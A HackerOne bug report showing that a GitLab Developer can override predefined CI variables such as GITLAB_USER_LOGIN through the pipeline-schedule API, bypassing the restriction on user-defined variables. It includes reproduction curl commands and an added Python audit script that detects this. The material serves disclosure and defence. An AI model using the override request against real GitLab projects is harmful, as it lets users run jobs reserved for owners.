Bypass predefined vars
HackerOne report #2125189 by ali_shehab
on 2023-08-27, assigned to @rshambhuni:
Report
Summary
Hi team. An admin can set that only maintainers and owners can bypass predefined variables. If this is set to true, a developer who tries to override them manually gets an error; however, this is bypassable via the REST API.
Steps to reproduce
- Create a group and a project in the group.
- Add this .gitlab-ci.yaml file to the project and lock this file.

```yaml
stages:
  - build
  - owner-only

build:
  stage: build
  image: ubuntu
  script:
    - echo "This is a normal job..."

owner-only:
  stage: owner-only
  image: ubuntu
  script:
    - echo "This should only run if the pipeline was triggered by ali_shehab"
  rules:
    - if: '$GITLAB_USER_LOGIN == "ali_shehab"'
```
- This means that the owner-only job will only be triggered if the pipeline was triggered by ali_shehab.
- Disable overriding variables:

```shell
curl -X PUT -H "PRIVATE-TOKEN: TOKEN" "https://gitlab-private.net/api/v4/projects/16?restrict_user_defined_variables=true"
```

- Now invite user B with the Developer role.
- Now user B creates a scheduled pipeline.
- He sends this API request to add variables to the scheduled pipeline:

```shell
curl --request POST --header "PRIVATE-TOKEN: TOKEN" "https://gitlab.com/api/v4/projects/{project}/pipeline_schedules/{pipeline_schedule_id}/variables?key=GITLAB_USER_LOGIN&value=ali_shehab"
```

- Now he runs the schedule and overrides the predefined variables.
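The steps above show that a scheduled pipeline's variables are not covered by `restrict_user_defined_variables`, so a job rule keyed on `$GITLAB_USER_LOGIN` cannot be trusted as an authorization check. As an added example (not part of the report and not GitLab's own code), the following audit helper takes the JSON that `GET /projects/:id/pipeline_schedules/:pipeline_schedule_id` returns (it includes `owner` and `variables`) together with the owners' project access levels, and flags every schedule variable whose name shadows a predefined `CI_*` or `GITLAB_*` variable, noting whether the owner sits below Maintainer. The sample schedules and access levels are constructed; the access-level constants follow GitLab's documented Members API values.

```python
# Added audit example: find pipeline-schedule variables that shadow predefined
# CI/CD variables. Not part of the original report; sample data is constructed.

# GitLab access levels as documented in the Members API.
DEVELOPER = 30
MAINTAINER = 40

# Predefined CI/CD variable families that jobs commonly treat as trusted.
# A user-supplied variable with one of these names shadows the server-set value.
PREDEFINED_PREFIXES = ("CI_", "GITLAB_")


def shadows_predefined(key: str) -> bool:
    """True if a user-supplied variable name collides with a predefined variable family."""
    return key.startswith(PREDEFINED_PREFIXES)


def audit_schedules(schedules, access_levels):
    """Return findings for schedule variables that shadow predefined variables.

    schedules: list of dicts shaped like the pipeline schedule detail response
      (fields used: id, description, owner.id, owner.username, variables[].key).
    access_levels: dict mapping owner user id -> project access level, e.g. from
      GET /projects/:id/members/all.
    Each finding records whether the owner is below Maintainer, which is exactly
    the case restrict_user_defined_variables is meant to block.
    """
    findings = []
    for sched in schedules:
        owner = sched["owner"]
        level = access_levels.get(owner["id"], 0)
        for var in sched.get("variables", []):
            if shadows_predefined(var["key"]):
                findings.append({
                    "schedule_id": sched["id"],
                    "description": sched.get("description", ""),
                    "owner": owner["username"],
                    "key": var["key"],
                    "owner_below_maintainer": level < MAINTAINER,
                })
    return findings


# Constructed sample data: two schedules in one project. The second one sets a
# GITLAB_* variable from a Developer-owned schedule, the pattern described above.
SAMPLE_SCHEDULES = [
    {
        "id": 11,
        "description": "nightly build",
        "owner": {"id": 7, "username": "maintainer_user"},
        "variables": [{"key": "DEPLOY_ENV", "value": "staging", "variable_type": "env_var"}],
    },
    {
        "id": 12,
        "description": "weekly",
        "owner": {"id": 42, "username": "developer_user"},
        "variables": [{"key": "GITLAB_USER_LOGIN", "value": "project_owner", "variable_type": "env_var"}],
    },
]
SAMPLE_ACCESS = {7: MAINTAINER, 42: DEVELOPER}


if __name__ == "__main__":
    for finding in audit_schedules(SAMPLE_SCHEDULES, SAMPLE_ACCESS):
        print(finding)
```

Running the block prints one finding: schedule 12, owned by a Developer, sets `GITLAB_USER_LOGIN`. In a real audit the two inputs come from the schedule detail endpoint and the project members endpoint; the prefix list is deliberately broad because any `CI_*` or `GITLAB_*` name set by a user masks the value the runner would otherwise supply.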
Impact
Able to bypass predefined variables even if only maintainers and developers are allowed.